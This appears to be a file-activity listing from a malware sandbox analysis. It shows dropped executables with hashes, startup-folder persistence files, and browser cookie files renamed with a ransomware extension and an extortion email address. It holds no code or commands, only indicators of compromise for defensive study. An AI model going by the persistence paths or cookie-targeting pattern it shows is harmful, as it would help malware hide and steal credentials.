    a6c674ba3d510120a1d163be7e7638f616eedb15af5653b0952e63b7fd4c2672fafc9638ab7795e76b7f07d995196437d6c35e5b8814e9ad866ea903f620e81e

  • C:\Users\Admin\AppData\Roaming\9.exe

  • C:\Users\Admin\AppData\Roaming\9.exe

  • C:\Users\Admin\AppData\Roaming\9.exe

  • C:\Users\Admin\AppData\Roaming\9.exe

  • C:\Users\Admin\AppData\Roaming\9.exe

  • C:\Users\Admin\AppData\Roaming\9.exe

  • C:\Users\Admin\AppData\Roaming\9.exe

  • C:\Users\Admin\AppData\Roaming\J-96T9R9\J-9logim.jpeg

  • C:\Users\Admin\AppData\Roaming\J-96T9R9\J-9logri.ini

  • C:\Users\Admin\AppData\Roaming\J-96T9R9\J-9logrv.ini

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3825035466-2522850611-591511364-1000\83aa4cc77f591dfc2374580bbd95f6ba_fc0e0041-a258-4d5d-ad46-ed56e156a8eb

  • C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.dat

  • C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe

    MD5

    3d2c6861b6d0899004f8abe7362f45b7

    SHA1

    33855b9a9a52f9183788b169cc5d57e6ad9da994

    SHA256

    dbe95b94656eb0173998737fb5e733d3714c8e3b58226a1a038ca85257c8b064

    SHA512

    19b28a05d6e0d6026fb47a20e2ff43bfdf32387ee823053dcd4878123b20730c0ea65d01ff25080c484f67eeedb2caa45b4b5eb01a3a3bb2d3bc5246cc73aa6e

  • C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe

    MD5

    3d2c6861b6d0899004f8abe7362f45b7

    SHA1

    33855b9a9a52f9183788b169cc5d57e6ad9da994

    SHA256

    dbe95b94656eb0173998737fb5e733d3714c8e3b58226a1a038ca85257c8b064

    SHA512

    19b28a05d6e0d6026fb47a20e2ff43bfdf32387ee823053dcd4878123b20730c0ea65d01ff25080c484f67eeedb2caa45b4b5eb01a3a3bb2d3bc5246cc73aa6e

  • C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe

    MD5

    3d2c6861b6d0899004f8abe7362f45b7

    SHA1

    33855b9a9a52f9183788b169cc5d57e6ad9da994

    SHA256

    dbe95b94656eb0173998737fb5e733d3714c8e3b58226a1a038ca85257c8b064

    SHA512

    19b28a05d6e0d6026fb47a20e2ff43bfdf32387ee823053dcd4878123b20730c0ea65d01ff25080c484f67eeedb2caa45b4b5eb01a3a3bb2d3bc5246cc73aa6e

  • C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe

    MD5

    3d2c6861b6d0899004f8abe7362f45b7

    SHA1

    33855b9a9a52f9183788b169cc5d57e6ad9da994

    SHA256

    dbe95b94656eb0173998737fb5e733d3714c8e3b58226a1a038ca85257c8b064

    SHA512

    19b28a05d6e0d6026fb47a20e2ff43bfdf32387ee823053dcd4878123b20730c0ea65d01ff25080c484f67eeedb2caa45b4b5eb01a3a3bb2d3bc5246cc73aa6e

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\0797UHZL.txt

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\1Z2ZRHPR.txt

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\1Z2ZRHPR.txt.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\AP0OAKS1.txt.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\AY7XHPRG.txt

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\FFPXUHEB.txt

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\FMSTB1L3.txt

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\HHBIO06U.txt

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\HYK21CF8.txt

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\HYK21CF8.txt.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\JN6U4BA2.txt

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\KDHX9VDQ.txt

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\MQT01GO1.txt

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\PY7KO6H5.txt

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\S2PCY1I3.txt

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\UX33Q2FV.txt

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartupCMD28.lnk

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta

    MD5

    245233164af05a3081bb7a1647e6c153

    SHA1

    a127cf8c295993bd99bdf72435242eb879dcaa6e

    SHA256

    948128249c81f1427d0af85bd2bbf9e788ea6aa2f347a84c2787b63acb421205

    SHA512

    604f617c0f477a1743ed9ee759b766628b3f4793ad28920056026b44df872401753f99897907d34591779992b29f1773ecbeb46512930b1402964d72dc4950c8

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PickerHost.url

  • C:\Users\Admin\AppData\Roaming\O5N16ST5\O5Nlogim.jpeg

  • C:\Users\Admin\AppData\Roaming\O5N16ST5\O5Nlogri.ini

  • C:\Users\Admin\AppData\Roaming\O5N16ST5\O5Nlogrv.ini

  • C:\Users\Admin\AppData\Roaming\feeed.exe

    MD5

    dea5598aaf3e9dcc3073ba73d972ab17

    SHA1

    51da8356e81c5acff3c876dffbf52195fe87d97f

    SHA256

    8ec9516ac0a765c28adfe04c132619170e986df07b1ea541426be124fb7cfd2c

    SHA512

    a6c674ba3d510120a1d163be7e7638f616eedb15af5653b0952e63b7fd4c2672fafc9638ab7795e76b7f07d995196437d6c35e5b8814e9ad866ea903f620e81e

  • C:\Users\Admin\AppData\Roaming\feeed.exe

    MD5

    dea5598aaf3e9dcc3073ba73d972ab17

    SHA1

    51da8356e81c5acff3c876dffbf52195fe87d97f

    SHA256

    8ec9516ac0a765c28adfe04c132619170e986df07b1ea541426be124fb7cfd2c

    SHA512

    a6c674ba3d510120a1d163be7e7638f616eedb15af5653b0952e63b7fd4c2672fafc9638ab7795e76b7f07d995196437d6c35e5b8814e9ad866ea903f620e81e

  • C:\Users\Admin\Desktop\08751be484e1572995ebb085df1c2c6372084d63a64dce7fab28130d79a6ea2d.exe

  • C:\Users\Admin\Desktop\0a9f79abd48b95544d7e2b6658637d1eb23067a94e10bf06d05c9ecc73cf4b51.exe

  • C:\Users\Admin\Desktop\0di3x.exe

  • C:\Users\Admin\Desktop\201106-9sxjh7tvxj_pw_infected.zip

  • C:\Users\Admin\Desktop\2019-09-02_22-41-10.exe

  • C:\Users\Admin\Desktop\2c01b007729230c415420ad641ad92eb.exe

  • C:\Users\Admin\Desktop\31.exe

  • C:\Users\Admin\Desktop\31.exe

  • C:\Users\Admin\Desktop\3DMark 11 Advanced Edition.exe

  • C:\Users\Admin\Desktop\3DMark 11 Advanced Edition.exe